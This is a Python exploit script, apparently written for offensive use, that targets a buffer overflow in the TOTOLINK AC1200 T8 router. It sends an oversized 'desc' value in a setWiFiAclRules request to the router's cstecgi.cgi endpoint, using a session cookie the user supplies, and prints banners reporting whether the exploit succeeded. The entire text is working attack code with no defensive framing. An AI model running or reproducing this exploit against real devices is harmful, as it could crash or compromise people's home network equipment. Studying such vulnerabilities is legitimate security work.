import requests import sys import time if len(sys.argv) != 5: print("Example : exploit_totolink.py ") sys.exit(1) target_url = sys.argv[1] # e.g., http://127.0.0.1/cgi-bin/cstecgi.cgi session_cookie = {"Cookie": sys.argv[2]} # e.g., SESSION_ID=2:1721039211:2 payload_size = int(sys.argv[3]) # Payload size random_payload_option = sys.argv[4].lower() == 'yes' # Use random payload if 'yes' print(""" Developed by Vidura Ranathunga ==================================================================== [!] Exploiting TOTOLINK AC1200 T8 Buffer Overflow Vulnerability """) def generate_random_payload(size): return 'b' * size # Basic payload; you could enhance this with randomness if needed def exploit_totolink(url, session_cookie, payload_size, use_random): if use_random: payload_desc = generate_random_payload(payload_size) else: payload_desc = 'b' * payload_size data = { "topicurl": "setWiFiAclRules", "addEffect": "1", "mac": "111", "desc": payload_desc, } try: response = requests.post(url, cookies=session_cookie, json=data) print("Response Status Code:", response.status_code) print("Response Text:", response.text) if response.status_code == 200: print("Exploit may have been successful.") else: print("Exploit failed with status code:", response.status_code) except Exception as e: print("An error occurred:", e) if __name__ == "__main__": print(f""" ============================================================ [!] TOTOLINK AC1200 T8 Exploit ----------------------------------------------------------- [*] Target URL: {target_url} [*] Session Cookie: {session_cookie} [*] Payload Size: {payload_size} [*] Random Payload: {'Yes' if random_payload_option else 'No'} """) exploit_totolink(target_url, session_cookie, payload_size, random_payload_option)